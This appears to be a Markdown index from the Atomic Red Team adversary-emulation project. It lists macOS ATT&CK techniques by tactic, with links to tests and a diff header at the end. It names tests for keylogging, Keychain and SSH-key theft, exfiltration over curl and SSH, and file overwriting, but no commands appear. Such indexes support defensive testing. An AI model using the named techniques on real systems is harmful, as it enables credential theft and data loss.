- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #7: MacOS Swift Keylogger [macos]
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1142 Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #8: List macOS Firewall Rules [macos]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #7: Examine password policy - macOS [macos]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# command-and-control
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
# execution
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1155 AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
atomics/Indexes/Indexes-Markdown/office-365-index.md
-96
View File
@@ -1,96 +0,0 @@
# Office 365 Atomic Tests by ATT&CK Tactic & Technique
# credential-access
